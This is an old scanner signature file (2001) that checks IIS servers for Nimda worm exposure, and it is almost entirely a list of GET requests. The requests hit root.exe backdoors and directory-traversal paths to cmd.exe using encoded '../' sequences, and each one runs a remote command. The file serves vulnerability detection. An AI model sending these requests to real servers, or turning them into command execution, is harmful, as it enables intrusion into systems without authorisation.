################################################################################################### # scan for Nimda Worm Vulnerable machines # by Zedfly # date 2001/09/19 # 200 OK-> GET :/scripts/root.exe?/c+dir^Nimda check1;; 200 OK-> GET :/MSADC/root.exe?/c+dir ^Nimda check2;; 200 OK-> GET :/c/winnt/system32/cmd.exe?/c+dir^Nimda check3;; 200 OK-> GET :/d/winnt/system32/cmd.exe?/c+dir^Nimda check4;; 200 OK-> GET :/scripts/..%255c../winnt/system32/cmd.exe?/c+dir^Nimda check5;; 200 OK-> GET :/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir^Nimda check6;; 200 OK-> GET :/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir^Nimda check7;; 200 OK-> GET :/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir^Nimda check8;; 200 OK-> GET :/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir^Nimda check9;; 200 OK-> GET :/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir^Nimda check10;; 200 OK-> GET :/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir^Nimda check11;; 200 OK-> GET :/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir^Nimda check12;; 200 OK-> GET :/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir^Nimda check13;; 200 OK-> GET :/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir^Nimda check14;; 200 OK-> GET :/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir^Nimda check15;; 200 OK-> GET :/scripts/..%252f../winnt/system32/cmd.exe?/c+dir^Nimda check16;; 200 OK-> GET :/scripts/root.exe?/c+dir^Nimda check17;; 200 OK-> GET :/MSADC/root.exe?/c+dir^Nimda check18;; 200 OK-> GET :/c/winnt/system32/cmd.exe?/c+dir^Nimda check19;; 200 OK-> GET :/d/winnt/system32/cmd.exe?/c+dir^Nimda check20;; 200 OK-> GET :/scripts/..%255c../winnt/system32/cmd.exe?/c+dir^Nimda check21;; 200 OK-> GET :/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir^Nimda check22;; 200 OK-> GET :/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir^Nimda check23;;